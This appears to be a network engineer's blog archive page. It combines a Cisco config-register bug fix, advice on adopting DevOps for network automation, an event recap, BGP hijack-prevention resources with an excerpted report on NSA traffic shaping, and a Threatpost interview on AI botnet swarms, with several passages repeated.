- bug associated : CSCvh27335
- multiple platforms affected
- incl. C800 series, C180x series
- same issue also with Cisco ISR 2811
- changing confreg values doesn't work via ROMMON nor via config
-------------------------------------------------------------------------------------------------
SOLUTION:
Change the console baud-rate to a default which is 9600.
After the reload a correct 0x2102 value would show up properly.
conf t
line con 0
speed 9600
do wr
do sh ver | s register
-------------------------------------------------------------------------------------------------
MagLab-phys-R01(config-line)#do sh ver
Cisco IOS Software, C180X Software (C180X-ADVENTERPRISEK9-M), Version 15.1(4)M12a, RELEASE SOFTWARE (fc1)
ROM: System Bootstrap, Version 12.3(8r)YH13, RELEASE SOFTWARE (fc1)
R01 uptime is 3 hours, 25 minutes
System image file is "flash:c180x.bin"
Last reload type: Normal Reload
Cisco 1802 (MPC8500) processor (revision 0x200) with 589824K/65536K bytes of memory.
9 FastEthernet interfaces
1 ISDN Basic Rate interface
1 ATM interface
1 Virtual Private Network (VPN) Module
250880K bytes of ATA CompactFlash (Read/Write)
Configuration register is 0x3922 <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
MagLab-phys-R01#conf t
Enter configuration commands, one per line. End with CNTL/Z.
MagLab-phys-R01(config)#config-r
MagLab-phys-R01(config)#config-register 0x2102
MagLab-phys-R01(config)# do sh ver | s register
Configuration register is 0x3922
MagLab-phys-R01(config)#line con 0
MagLab-phys-R01(config-line)#speed 9600
MagLab-phys-R01(config-line)#do sh ver | s register
Configuration register is 0x3922 (will be 0x2102 at next reload)
MagLab-phys-R01(config-line)# -------------------------------------------------------------------------------------------------
Showing posts with label CCNP. Show all posts
Showing posts with label CCNP. Show all posts
Monday, August 26, 2019
Wednesday, July 3, 2019
Mistakes when adopting DevOps for production network automation
If that sounds a lot like “DevOps is coming to a network near you”
then you have perfect pitch, because that’s exactly what’s going on
inside enterprises around the globe.
We already have plenty of evidence, empirical and anecdotal, to indicate that use of automation and orchestration in production environments is not an anomaly. In fact, it appears to be accelerating as NetOps teams try to catch up to their DevOps counterparts.
The pressure to reach automated parity with app development environments can lead to skipping the strategy and going right for the tactical approach to adopting a more agile, automated means of making changes to the production pipeline.
That’s not a good thing. Production is not development, and the blast radius is significantly larger in production where there are hundreds -- sometimes thousands -- of applications and business processes relying on shared networking services. You can’t fail fast enough to avoid incurring damages when something goes wrong.
So as automation and orchestration become the norm in production environments, NetOps teams should be mindful of which DevOps practices they embrace and which they don’t. Because when bad habits are really hard to break, the best option is simply to avoid forming them in the first place.
To help you out, here are the top three bad habits you should avoid when adopting DevOps for production network automation and orchestration:
The State of Code Review 2017 from SmartBear, a supplier of software-quality tools for teams, notes that 74% of developers participate in code reviews. That sounds good, until you realize that means the other 26% aren’t. Unsurprisingly, the No. 1 reason cited for not reviewing code at desired levels is workload.
This is how defects and bugs (excuse me, "undocumented features") creep into software. These are logic and security-based mistakes that can lead to crashes, outages, memory leaks, and even breaches. When you’re writing scripts, and integrating multiple services to automate and orchestrate a process, you are writing code. And if you are writing code, it needs to be reviewed by someone other than you.
Remember, this isn’t testing or QA where you can mess up and it doesn’t impact the business’ bottom line. This will be production, and a single mistake can lead to all sorts of problems. Make the time to conduct code reviews. The benefits are well-documented and include:
According to a 2016 survey conducted by Software Improvement Group and O’Reilly, 70% of respondents "believe that maintainability is the most important aspect of code to measure, even as compared to performance or security."
I hate PERL, and I’m not all that fond of Python. So I’m going to use node.js instead. Or maybe I’m just going to craft some incomprehensible command-line magic with sed, awk, and my friend grep to push this change to that router. Problem is, no one else uses node.js and that command line relies on my system-specific configuration.
That is not maintainable, and using “whatever language/tool/system” you want to build scripts and services to automate networking makes embracing code reviews really, really hard. It won’t go well for you. If no one else can maintain that code, it becomes yours. For life.
It’s like the goldfish you begged for when you were eight and now you’re stuck with it.
Standardizing on languages, tools, and systems early is important.
3. Ignoring security Rule Zero
Every AD&D (Dungeons and Dragons) player, at least all the ones I play with, know about Rule Zero: “The Dungeon Master is the final arbiter of all rule decisions.” It supersedes all other rules in the game, hence the reason it is numbered as zero. In security, we also have a rule zero: “Thou shalt never trust user input. Ever.”
A number of high-profile outages were caused by ignoring this rule because command-line parameters passed to any script are, by default, user input. Ignoring this rule may trigger one a resume-generating event by accidentally causing an outage of extreme proportions.
Never trust user input explicitly.
Whether that’s the IP address of a wiring closet switch or a variable passed to inform a firewall script which port to open or close, don’t blindly execute on it. Instead, always validate input and, if necessary, force the human invoker of the script to verify the input. After all, they might not have meant to push that configuration change to every switch.
As you proceed with efforts to automate IT in 2018, pay close attention to the habits you’re forming. Avoiding these three bad habits will go a long way toward ensuring a successful and productive year.
We already have plenty of evidence, empirical and anecdotal, to indicate that use of automation and orchestration in production environments is not an anomaly. In fact, it appears to be accelerating as NetOps teams try to catch up to their DevOps counterparts.
The pressure to reach automated parity with app development environments can lead to skipping the strategy and going right for the tactical approach to adopting a more agile, automated means of making changes to the production pipeline.
That’s not a good thing. Production is not development, and the blast radius is significantly larger in production where there are hundreds -- sometimes thousands -- of applications and business processes relying on shared networking services. You can’t fail fast enough to avoid incurring damages when something goes wrong.
So as automation and orchestration become the norm in production environments, NetOps teams should be mindful of which DevOps practices they embrace and which they don’t. Because when bad habits are really hard to break, the best option is simply to avoid forming them in the first place.
To help you out, here are the top three bad habits you should avoid when adopting DevOps for production network automation and orchestration:
3 Bad Habits NetOps Should Avoid
1. Skipping the code reviewThe State of Code Review 2017 from SmartBear, a supplier of software-quality tools for teams, notes that 74% of developers participate in code reviews. That sounds good, until you realize that means the other 26% aren’t. Unsurprisingly, the No. 1 reason cited for not reviewing code at desired levels is workload.
This is how defects and bugs (excuse me, "undocumented features") creep into software. These are logic and security-based mistakes that can lead to crashes, outages, memory leaks, and even breaches. When you’re writing scripts, and integrating multiple services to automate and orchestrate a process, you are writing code. And if you are writing code, it needs to be reviewed by someone other than you.
Remember, this isn’t testing or QA where you can mess up and it doesn’t impact the business’ bottom line. This will be production, and a single mistake can lead to all sorts of problems. Make the time to conduct code reviews. The benefits are well-documented and include:
- increased quality of code with higher chance of identifying and eliminating security flaws
- knowledge sharing -- others learn the process along with the code
- compliance (ISO 9000/9001)
According to a 2016 survey conducted by Software Improvement Group and O’Reilly, 70% of respondents "believe that maintainability is the most important aspect of code to measure, even as compared to performance or security."
I hate PERL, and I’m not all that fond of Python. So I’m going to use node.js instead. Or maybe I’m just going to craft some incomprehensible command-line magic with sed, awk, and my friend grep to push this change to that router. Problem is, no one else uses node.js and that command line relies on my system-specific configuration.
That is not maintainable, and using “whatever language/tool/system” you want to build scripts and services to automate networking makes embracing code reviews really, really hard. It won’t go well for you. If no one else can maintain that code, it becomes yours. For life.
It’s like the goldfish you begged for when you were eight and now you’re stuck with it.
Standardizing on languages, tools, and systems early is important.
3. Ignoring security Rule Zero
Every AD&D (Dungeons and Dragons) player, at least all the ones I play with, know about Rule Zero: “The Dungeon Master is the final arbiter of all rule decisions.” It supersedes all other rules in the game, hence the reason it is numbered as zero. In security, we also have a rule zero: “Thou shalt never trust user input. Ever.”
A number of high-profile outages were caused by ignoring this rule because command-line parameters passed to any script are, by default, user input. Ignoring this rule may trigger one a resume-generating event by accidentally causing an outage of extreme proportions.
Never trust user input explicitly.
Whether that’s the IP address of a wiring closet switch or a variable passed to inform a firewall script which port to open or close, don’t blindly execute on it. Instead, always validate input and, if necessary, force the human invoker of the script to verify the input. After all, they might not have meant to push that configuration change to every switch.
As you proceed with efforts to automate IT in 2018, pay close attention to the habits you’re forming. Avoiding these three bad habits will go a long way toward ensuring a successful and productive year.
Thursday, March 7, 2019
Cisco DevNet Express Security 2019, Prague
** Cisco DevNet Express ** Prague - 5-6.3.2018
- We created a simple automated workflow, using a different APIs.
- We identified the Rouge endpoints where malware has executed in our network using AMP for endpoints.
- We used ISE to quarantine these endpoints to contain the known threats.
- We used the AMP data to collect intelligence on the SHAs using Threat Grid.
- We developed the IPs and Domain list associated with these SHAs from Threat Grid.
- We used Umbrella Investigate to gather intelligence on the Domains/IPs.
- We used Umbrella Enforcement to contain the threat and prevent the malware from executing, as it can't call home.
- We used FirePower FDM APIs to enforce and contain the threat on the NextGen firewalls.
- We used the Python programming language to call different APIs.
- We used Python to pull and push data from different security systems - creating one.
- We used the Python to parse the JSON, XML, YAML and REST API.
- We learn how to gather the Intelligence and use it to quickly contain the threat to protect the rest of the network.
- The future of DevOps is needed in Security Business already and coming fast to the networking as well.
For one of the participants it was also very happy day as he gained not only knowledge but also a fully equipped Raspberry Pi 3B+ !
It was my first reward gained from a CyberSecOps business :) And a fourth RPi into the collection :D
Friday, December 28, 2018
Professions are here for a reason
Thanks to Ivan Pepelnjak for the below one.
And many others as welll!
An unused knob is sometimes better than a used.
Professions are here for a reason – they enable people to do the work they’re qualified to do.Needless to say, it took him decades to fully understand its implications.
Do what you’re qualified to do. Don’t think you’re good as me at everything just because you can Google-and-paste. Figure out where your limitations are.
Seek help when you’re dealing with something beyond your comfort zone. The amount of ignorant improvisation we see in IT is stupefying. Have you ever wondered why lawyers and doctors ask for second opinion?
Yes, I know your manager expects you to know everything just because you have administrator or engineer in your job title, which just proves he never thought about the next two paragraphs.
Don’t think you understand other people’s job. I’m always amazed to watch people completely unqualified to have an opinion on a problem loudly offering it just because they’re experts in totally unrelated field. PhDs in chemistry telling IT engineers how to do their jobs would be one of my first-hand experiences.
Don’t think you could do their jobs better than they do… until you tried and proved you can succeed while facing the same constraints they have. My favorite one: an airline pilot confident he could write a program to do airline’s crew scheduling (which is probably an NP-hard problem) on Commodore-64.
Having said all that, do your job well if you want to earn and retain the trust of your peers. If you’re obviously clueless or randomly throwing fixes at the problem trying to figure out which one might stick don’t be surprised when everyone else starts acting in ways I described above.
Accept help (courtesy of Chris Young). When a grey-beard gives you a piece of advice - LISTEN. Doesn’t mean you have to accept it as truth or obey their commands, but watching people new to the profession make the same mistakes we all made 20 years ago because they didn’t heed the warning is frustrating…
And “I told you so” doesn’t fix the network or the harm that major network outages cause to our reputation as a profession.
Saturday, December 8, 2018
BGP hijack prevention
- IRR Power Tools (IRRPT) https://github.com/6connect/irrpt
- Internet Routing Registry Toolset (IRRToolset) https://github.com/irrtoolset/irrtoolset
- BGPQ3 https://github.com/snar/bgpq3
- Ansible http://www.ansible.com/
- Cisco Network Services Orchestrator http://www.cisco.com/go/nso
- IRR Explorer http://irrexplorer.nlnog.net/
https://www.manrs.org
---------------------------------
https://www.blackhat.com/presentations/bh-dc-09/Zmijewski/BlackHat-DC-09-Zmijewski-Defend-BGP-MITM.pdf
---------------------------------
all of the team members needed to be able to work creatively,
independently and yet still in concert with each other, sometimes under
circumstances of limited communications.
---------------------------------
International detours and routing changes happen automatically,
without human intervention. Even so, they offer an opportunity to the
NSA. With some exceptions, the surveillance of raw Internet traffic from
foreign points of interception can be conducted entirely under the
authority of the president.
Congressional and judicial limitations come into play only when that raw Internet traffic is used to “intentionally target a U.S. person,” a legal notion that is narrowly interpreted to exclude the bulk collection, storage, and even certain types of computerized data analysis.8
This is a crucial issue, because American data are routed across foreign communications cables. Several leading thinkers,9 including Jennifer Granick in her recent report for The Century Foundation, have drawn attention to the creeping risk of domestic surveillance that is conducted from afar.
This report describes a novel and more disturbing set of risks. As a technical matter, the NSA does not have to wait for domestic communications to naturally turn up abroad.
In fact, the agency has technical methods that can be used to deliberately reroute Internet communications. The NSA uses the term “traffic shaping” to describe any technical means the deliberately reroutes Internet traffic to a location that is better suited, operationally, to surveillance.
Since it is hard to intercept Yemen’s international communications from inside Yemen itself, the agency might try to “shape” the traffic so that it passes through friendly communications cables located on friendlier territory.10
Think of it as diverting part of a river to a location from which it is easier (or more legal) to catch fish.
The NSA has clandestine means of diverting portions of the river of Internet traffic that travels on global communications cables.
If, for example, the Federal Bureau of Investigations (FBI) wants to monitor electronic communications between two Americans as part of a criminal investigation, it is required by law to obtain a warrant.12
If the intelligence community wants to intercept Americans’ communications inside the United States, for national security reasons, then it must follow rules established by the Foreign Intelligence Surveillance Act (FISA).13
Meanwhile, when the intelligence community wants to intercept traffic abroad, its surveillance is mostly regulated by Executive Order 12333 (EO 12333),14 issued by Ronald Reagan in 1981.15
Surveillance programs conducted under FISA are subject to oversight by the FISA Court and regular review by the intelligence committees in Congress.
Meanwhile, surveillance programs under EO 12333 are largely unchecked by either the legislative16 or judicial branch. EO 12333 programs are conducted entirely under the authority of the president.
The narrow interpretation of “targeting” has significant implications on privacy for U.S. persons. For instance, the NSA has built a “search engine”44 that allows analysts to hunt through raw data collected in bulk through various means. If a human analyst uses that search engine to search for communications linked to a specific email address, Facebook username, or other personal identifier—a “selector”45—then that counts as “intentional targeting.”
However, if an analyst obtains information using search terms that do not implicate a single individual—for example, words or phrases such as “Yemen” or “nuclear proliferation”—the communications swept up as part of this search, such as an email between two Americans discussing current events in Yemen, are not considered to be “intentionally targeted.”46 Instead, these communications are merely “incidentally collected.”47
U.S. surveillance techniques are classified, which prevents outside observers from making categorical statements about how far the intelligence community stretches this notion of “incidental collection.”
Congressional and judicial limitations come into play only when that raw Internet traffic is used to “intentionally target a U.S. person,” a legal notion that is narrowly interpreted to exclude the bulk collection, storage, and even certain types of computerized data analysis.8
This is a crucial issue, because American data are routed across foreign communications cables. Several leading thinkers,9 including Jennifer Granick in her recent report for The Century Foundation, have drawn attention to the creeping risk of domestic surveillance that is conducted from afar.
This report describes a novel and more disturbing set of risks. As a technical matter, the NSA does not have to wait for domestic communications to naturally turn up abroad.
In fact, the agency has technical methods that can be used to deliberately reroute Internet communications. The NSA uses the term “traffic shaping” to describe any technical means the deliberately reroutes Internet traffic to a location that is better suited, operationally, to surveillance.
Since it is hard to intercept Yemen’s international communications from inside Yemen itself, the agency might try to “shape” the traffic so that it passes through friendly communications cables located on friendlier territory.10
Think of it as diverting part of a river to a location from which it is easier (or more legal) to catch fish.
The NSA has clandestine means of diverting portions of the river of Internet traffic that travels on global communications cables.
If, for example, the Federal Bureau of Investigations (FBI) wants to monitor electronic communications between two Americans as part of a criminal investigation, it is required by law to obtain a warrant.12
If the intelligence community wants to intercept Americans’ communications inside the United States, for national security reasons, then it must follow rules established by the Foreign Intelligence Surveillance Act (FISA).13
Meanwhile, when the intelligence community wants to intercept traffic abroad, its surveillance is mostly regulated by Executive Order 12333 (EO 12333),14 issued by Ronald Reagan in 1981.15
Surveillance programs conducted under FISA are subject to oversight by the FISA Court and regular review by the intelligence committees in Congress.
Meanwhile, surveillance programs under EO 12333 are largely unchecked by either the legislative16 or judicial branch. EO 12333 programs are conducted entirely under the authority of the president.
The narrow interpretation of “targeting” has significant implications on privacy for U.S. persons. For instance, the NSA has built a “search engine”44 that allows analysts to hunt through raw data collected in bulk through various means. If a human analyst uses that search engine to search for communications linked to a specific email address, Facebook username, or other personal identifier—a “selector”45—then that counts as “intentional targeting.”
However, if an analyst obtains information using search terms that do not implicate a single individual—for example, words or phrases such as “Yemen” or “nuclear proliferation”—the communications swept up as part of this search, such as an email between two Americans discussing current events in Yemen, are not considered to be “intentionally targeted.”46 Instead, these communications are merely “incidentally collected.”47
U.S. surveillance techniques are classified, which prevents outside observers from making categorical statements about how far the intelligence community stretches this notion of “incidental collection.”
But how do communications between two Americans typically travel abroad?
It can sometimes be faster or cheaper for Internet service providers (ISP) to send traffic through a foreign country. The United States has a well-connected communications infrastructure, so it is rare to find a case where traffic sent between two domestic computers naturally travels through a foreign country.
Nevertheless, these cases do occur. One such case (identified by Dyn Research’s Internet measurement infrastructure) is presented below
(Figure 1)
The “traceroute” presented below shows how Internet traffic sent between two domestic computers travels through foreign territory. The traffic originates at a computer in San Jose and is routed through Frankfurt before arriving at its final destination in New York. The left column shows the Internet Protocol (IP) address of each Internet device on the route, the middle column names the Internet Service Provider (ISP) that owns this device, and the right column shows the location of the device.

Replicating U.S.-based data in foreign data centers is a common industry practice, in order to ensure that data can be recovered even in the face of local disasters (power outages, earthquakes, and so on).53 Google, for instance, maintains data centers in the United States, Taiwan, Singapore, Chile, Ireland, the Netherlands, Finland, and Belgium, and its privacy policy states: “Google processes personal information on our servers in many countries around the world. We may process your personal information on a server located outside the country where you live.”54 If two Americans use their Google accounts to communicate, their emails and chat logs may be backed up on Google’s data centers abroad, and thus can be “incidentally collected” as part of EO 12333 surveillance.
“Electronic surveillance”
is a legal term that is defined the FISA statute; in fact, despite several amendments, FISA’s definition of “electronic surveillance” remains largely unchanged from its original 1978 version. The FISA definition of “electronic surveillance” has two clauses that could be potentially cover hacking into a U.S. router and instructing it to perform traffic shaping via port-mirroring.
One clause in the FISA statute defines “electronic surveillance” to be
Another clause in the FISA statute defines “electronic surveillance” as
This clause covers the “acquisition” of communications inside the United States. However, one could argue that communications are not “acquired” when a U.S. router is hacked and instructed to perform port mirroring. The hacked router is merely instructed to copy traffic and pass it along, but not to read, store, or analyze it. Therefore, “acquisition” occurs at the tapped communication cable (abroad) rather than at the hacked router (inside the United States). As such, this clause is also not relevant.84
The intelligence community does not have to hack into routers or use other clandestine techniques to shape traffic—it could simply ask the corporations that own those routers to provide access, or shape the traffic themselves. A document leaked by Edward Snowden suggests that the NSA has done this through its FAIRVIEW program.
(FAIRVIEW was revealed to be a code name for AT&T100). The document states:
There is no evidence that the FAIRVIEW program is being used to shape traffic from inside the United States to foreign communications cables. But it is worth noting that, with the cooperation of corporations such as AT&T, traffic could easily be shaped to a collection point abroad without the need to hack into any routers, thus obviating many of the legal questions previously discussed.
Modern networking protocols and technologies can be manipulated in order to shape Internet traffic from inside the United States toward tapped communications cables located abroad. It is possible that traffic shaping is regulated by EO 12333, and not by FISA,102 since the techniques shape traffic in bulk, in a way that does not “intentionally target” any specific individual or organization.
Moreover, while FISA covers the “acquisition” of Internet traffic on U.S. territory, but the traffic shaping methods discussed merely move traffic around, but do not read, store, analyze, or otherwise “acquire” it. Instead, acquisition is performed on foreign soil, at the tapped communication cable. Finally, while the Fourth Amendment may require a warrant for hacking U.S. routers, the warrant requirement could be avoided by performing traffic shaping with the consent of corporations that own the routers (e.g. via the FAIRVIEW program), or by hacking foreign routers (and then using BGP manipulations).
While this approach sounds good in theory, in practice it is unlikely to work.
First, it is highly unlikely that we will ever have Internet infrastructure devices (e.g. routers) that cannot be hacked. Router software is complicated, and even the best attempt at an “unhackable” router is likely to contain bugs.104 Intelligence agencies have dedicated resources to finding and using these bugs to hack into routers.105 And even if we somehow manage to create bug-free router software, the intelligence community has been known to physically intercept routers as they ship in the mail, and tamper with their hardware.106
Second, it will take many years to develop and implement secure Internet protocols that prevent traffic shaping. A key challenge is that the Internet is a global system, one that transcends organizational and national boundaries. Deploying a secure Internet protocol requires cooperation from thousands of independent organizations in different nations. This is further complicated by the fact that many secure Internet protocols do not work well when they are used only by a small number of networks.107
Finally, while encryption can be used to hide the contents of Internet traffic, it does not hide metadata (that is, who is talking to whom, when they are talking, and for how long). Metadata is both incredibly revealing, and less protected by the law.108 Intelligence agencies have also dedicated resources toward compromising encryption.109 Moreover, EO 12333 allows the NSA to retain encrypted communications indefinitely.110 This is significant because the technology used to break encryption tends to improve over time—a message that was encrypted in the past could be decryptable in the future, as technology improves.111
This is not to say that technical solutions are unimportant. On the contrary, they are crucial, especially because they protect American’s traffic from snoopers, criminals, foreign intelligence services, and other entities that do not obey American laws. Nevertheless, technologies evolve at a rapid pace, so solving the problem using technology would be a continuous struggle.
It is much more sensible to realign the legal framework governing surveillance to encompass the technologies, capabilities, and practices of today and of the future.
It can sometimes be faster or cheaper for Internet service providers (ISP) to send traffic through a foreign country. The United States has a well-connected communications infrastructure, so it is rare to find a case where traffic sent between two domestic computers naturally travels through a foreign country.
Nevertheless, these cases do occur. One such case (identified by Dyn Research’s Internet measurement infrastructure) is presented below
(Figure 1)
The “traceroute” presented below shows how Internet traffic sent between two domestic computers travels through foreign territory. The traffic originates at a computer in San Jose and is routed through Frankfurt before arriving at its final destination in New York. The left column shows the Internet Protocol (IP) address of each Internet device on the route, the middle column names the Internet Service Provider (ISP) that owns this device, and the right column shows the location of the device.

Replicating U.S.-based data in foreign data centers is a common industry practice, in order to ensure that data can be recovered even in the face of local disasters (power outages, earthquakes, and so on).53 Google, for instance, maintains data centers in the United States, Taiwan, Singapore, Chile, Ireland, the Netherlands, Finland, and Belgium, and its privacy policy states: “Google processes personal information on our servers in many countries around the world. We may process your personal information on a server located outside the country where you live.”54 If two Americans use their Google accounts to communicate, their emails and chat logs may be backed up on Google’s data centers abroad, and thus can be “incidentally collected” as part of EO 12333 surveillance.
Traffic Shaping by “Port Mirroring” at Hacked Routers
It has been reported that the NSA already employs a technique to “shape” traffic so that it travels through a tapped communication cable. The traffic-shaping technique involves hacking into an Internet infrastructure device, for example, a router. A router is a device that forwards Internet traffic to its destination.73 In Figure 3, which was hand-drawn by a hacker employed by the NSA and later leaked, the hacked device74 is called a “CNE midpoint.”75“Electronic surveillance”
is a legal term that is defined the FISA statute; in fact, despite several amendments, FISA’s definition of “electronic surveillance” remains largely unchanged from its original 1978 version. The FISA definition of “electronic surveillance” has two clauses that could be potentially cover hacking into a U.S. router and instructing it to perform traffic shaping via port-mirroring.
One clause in the FISA statute defines “electronic surveillance” to be
the installation or use of an
electronic, mechanical, or other surveillance device in the United
States for monitoring to acquire information, other than from a wire or
radio communication, under circumstances in which a person has a
reasonable expectation of privacy and a warrant would be required for
law enforcement purposes.81
In other words, this clause covers the installation of a device in
the United States for surveillance. Hacking a U.S. router could
certainly be considered the installation of a device. However, a router
is a “wireline” device, and this clause does not cover devices that
acquire information from a “wire.”82 As such, this clause is not relevant to the discussion.Another clause in the FISA statute defines “electronic surveillance” as
the acquisition by an electronic,
mechanical, or other surveillance device of the contents of any wire
communication to or from a person in the United States, without the
consent of any party thereto, if such acquisition occurs in the United
States, but does not include the acquisition of those communications of
computer trespassers that would be permissible under section 2511(2)(i)
of title 18, United States Code.83
This clause covers the “acquisition” of communications inside the United States. However, one could argue that communications are not “acquired” when a U.S. router is hacked and instructed to perform port mirroring. The hacked router is merely instructed to copy traffic and pass it along, but not to read, store, or analyze it. Therefore, “acquisition” occurs at the tapped communication cable (abroad) rather than at the hacked router (inside the United States). As such, this clause is also not relevant.84
The intelligence community does not have to hack into routers or use other clandestine techniques to shape traffic—it could simply ask the corporations that own those routers to provide access, or shape the traffic themselves. A document leaked by Edward Snowden suggests that the NSA has done this through its FAIRVIEW program.
(FAIRVIEW was revealed to be a code name for AT&T100). The document states:
FAIRVIEW—Corp partner since 1985 with
access to int[ernational] cables, routers, and switches. The partner
operates in the U.S., but has access to information that transits the
nation and through its corporate relationships provide unique access to
other telecoms and ISPs. Aggressively involved in shaping traffic to run
signals of interest past our monitors.101
There is no evidence that the FAIRVIEW program is being used to shape traffic from inside the United States to foreign communications cables. But it is worth noting that, with the cooperation of corporations such as AT&T, traffic could easily be shaped to a collection point abroad without the need to hack into any routers, thus obviating many of the legal questions previously discussed.
Modern networking protocols and technologies can be manipulated in order to shape Internet traffic from inside the United States toward tapped communications cables located abroad. It is possible that traffic shaping is regulated by EO 12333, and not by FISA,102 since the techniques shape traffic in bulk, in a way that does not “intentionally target” any specific individual or organization.
Moreover, while FISA covers the “acquisition” of Internet traffic on U.S. territory, but the traffic shaping methods discussed merely move traffic around, but do not read, store, analyze, or otherwise “acquire” it. Instead, acquisition is performed on foreign soil, at the tapped communication cable. Finally, while the Fourth Amendment may require a warrant for hacking U.S. routers, the warrant requirement could be avoided by performing traffic shaping with the consent of corporations that own the routers (e.g. via the FAIRVIEW program), or by hacking foreign routers (and then using BGP manipulations).
Technical Solutions Will Not Work
One might be tempted to eliminate these loopholes via technical solutions. For instance, traffic shaping could be made more difficult by designing routers that are “unhackable,” and Internet protocols could be made secure against traffic-shaping manipulations. Or the confidentiality of traffic could be protected just by encrypting everything.While this approach sounds good in theory, in practice it is unlikely to work.
First, it is highly unlikely that we will ever have Internet infrastructure devices (e.g. routers) that cannot be hacked. Router software is complicated, and even the best attempt at an “unhackable” router is likely to contain bugs.104 Intelligence agencies have dedicated resources to finding and using these bugs to hack into routers.105 And even if we somehow manage to create bug-free router software, the intelligence community has been known to physically intercept routers as they ship in the mail, and tamper with their hardware.106
Second, it will take many years to develop and implement secure Internet protocols that prevent traffic shaping. A key challenge is that the Internet is a global system, one that transcends organizational and national boundaries. Deploying a secure Internet protocol requires cooperation from thousands of independent organizations in different nations. This is further complicated by the fact that many secure Internet protocols do not work well when they are used only by a small number of networks.107
Finally, while encryption can be used to hide the contents of Internet traffic, it does not hide metadata (that is, who is talking to whom, when they are talking, and for how long). Metadata is both incredibly revealing, and less protected by the law.108 Intelligence agencies have also dedicated resources toward compromising encryption.109 Moreover, EO 12333 allows the NSA to retain encrypted communications indefinitely.110 This is significant because the technology used to break encryption tends to improve over time—a message that was encrypted in the past could be decryptable in the future, as technology improves.111
This is not to say that technical solutions are unimportant. On the contrary, they are crucial, especially because they protect American’s traffic from snoopers, criminals, foreign intelligence services, and other entities that do not obey American laws. Nevertheless, technologies evolve at a rapid pace, so solving the problem using technology would be a continuous struggle.
It is much more sensible to realign the legal framework governing surveillance to encompass the technologies, capabilities, and practices of today and of the future.
Friday, November 30, 2018
AI and CDN used in Network Exploitation & Attacks (Pt.3)
Working together toward a common goal – attacking networks - that's the task of Intelligent Botnet. Able to share the information on vulnerabilities & hosts, quickly change used strategy without a Botnet horder.
[https://threatpost.com/newsmaker-interview-derek-manky-on-self-organizing-botnet-swarms/136936/]
For over five years Derek Manky, global security strategist at Fortinet and FortiGuard Labs, has been helping the private and public sector identify and fight cybercrime. His job also includes working with noted groups: Computer Emergency Response, NATO NICP, INTERPOL Expert Working Group and the Cyber Threat Alliance.
Recently Threatpost caught up with Manky to discuss the latest developments around his research on botnet “swarm intelligence.” That’s a technique where criminals enlist artificial intelligence (AI) inside botnet nodes. Those nodes are then programmed to work toward a common goal of bolstering an attack chain and accelerating the time it takes to breach an organization.

Threatpost: What are “self-organized botnet swarms?”
Manky: What we are starting to see [are] humans, such as the black-hat hackers, being taken out of the attack cycle more and more. Why? Because humans are slow by nature compared to machines.
Swarms accelerate the attack chain – or attack cycle. They help attackers move fast. Over time, as defenses improve, the window of time for an attack is shrinking. This is a way for attackers to make up for that lost time.
A self-learning swarm is a cluster of compromised devices that leverage peer-based AI to target vulnerable systems. Traditional botnets wait for commands from a bot herder. Swarms are able to make decisions independently. They can identify and assault – or swarm – different attack vectors all at once.
TP: What type of botnets are we talking about here? Botnets used for crippling a network? Where is this technology seen today?
Manky: Hide and Seek is a recent botnet that we have seen with the swarm technology in it.
TP: So, what makes Hide and Seek unique?
Manky: Typically a botnet will receive a command from the attacker, right? They go DDoS the target or try to exfiltrate information. But what we are starting to see with these new peer-to-peer botnets is they are able to share those commands – between botnet nodes – and act on their own without an attacker issuing any commands.
TP: Is this machine intelligence? And, what is it that these botnets are trying to learn from and execute?
Manky: They are collecting data. They are trying to learn information about potential attack targets – that is, exploits and weaknesses that they can launch a successful attack against. They are trying to pinpoint vulnerabilities or holes that they can actually go and launch a successful exploit against. They are looking for a penetration weakness – something they can send payload to. Once they find it, the node can let the rest of the botnet nodes know.
TP: Can you break this down into a likely scenario?
Manky: We’re starting to see this in the world of IoT. A hypothetical situation includes a network where there is a barrier – a network firewall, or policies. On the network is a printer, network attached storage, an IP security camera and a database. Then, for whatever reason, the IP security camera is on the same network segment as database. Now [the attack] can target the printer and infect the network attached storage, which infects the camera. Now the camera can be used as a proxy to gather intelligence.
That intelligence is shared between the nodes. It’s a structured command list where it can say “send me a list of targets that you know, have this within the network segment – along with intelligence on that segment.” And then – when the network configurations match – the nodes can swarm and request the exfiltration of data and launch more attacks.
TP: Is there anything that is unique about the size or agility of these botnets? Does this “intelligence” allow it to be more efficient and smaller?
Manky: Swarms are large by nature. But I would call them first, efficient. Traditional botnets are monolithic. Bot-herders typically rent a botnet out just to [launch] a DDoS attack or just to launch a phishing attack. But with swarms, they have the capability to spin up resources – similar to virtual machines.
Bot-herders can say, “I want 20 percent of this botnet doing DDoS. I want 30 percent doing phishing campaigns.” It’s more about monetization, efficiency and being fast.
TP: When you say “swarms,” can you give me a sense of what you exactly mean by that?
Manky: The best example is what we see in nature – such as birds, bees and ants. When ants communicate they use pheromones between each other. The pheromones mark the shortest path to bring back food to the nest. Ants, in this scenario, aren’t taking orders from the queen ant. They are acting on their own.
Now the same concept is being applied to botnet code. What we are seeing are precursors of this right now. Hide and Seek has the code, but isn’t using it yet.
Hide and Seek is a decentralized IoT botnet. The capabilities are in the code, but we are still waiting for the first full-blown attack using this technique.
I expect to see a lot more of this technology in 2019.
TP: Where does that leave us on the defense side of the equation?
Manky: It really needs to redefine the network security center. We are going to need more automated tools. It’s going to come down to AI versus AI. We need better security postures that are capable of actually detecting and acting on their own as well.
If you are up against a swarm, it’s very fast by nature. It can already breach a target, by the time a human administrator can detect it. For that reason, the network intelligence needs to be able to understand what it is seeing and be able to act on it.
At a higher level, it comes down to quality of intelligence and how much you trust your
[https://threatpost.com/newsmaker-interview-derek-manky-on-self-organizing-botnet-swarms/136936/]
For over five years Derek Manky, global security strategist at Fortinet and FortiGuard Labs, has been helping the private and public sector identify and fight cybercrime. His job also includes working with noted groups: Computer Emergency Response, NATO NICP, INTERPOL Expert Working Group and the Cyber Threat Alliance.
Recently Threatpost caught up with Manky to discuss the latest developments around his research on botnet “swarm intelligence.” That’s a technique where criminals enlist artificial intelligence (AI) inside botnet nodes. Those nodes are then programmed to work toward a common goal of bolstering an attack chain and accelerating the time it takes to breach an organization.

Threatpost: What are “self-organized botnet swarms?”
Manky: What we are starting to see [are] humans, such as the black-hat hackers, being taken out of the attack cycle more and more. Why? Because humans are slow by nature compared to machines.
Swarms accelerate the attack chain – or attack cycle. They help attackers move fast. Over time, as defenses improve, the window of time for an attack is shrinking. This is a way for attackers to make up for that lost time.
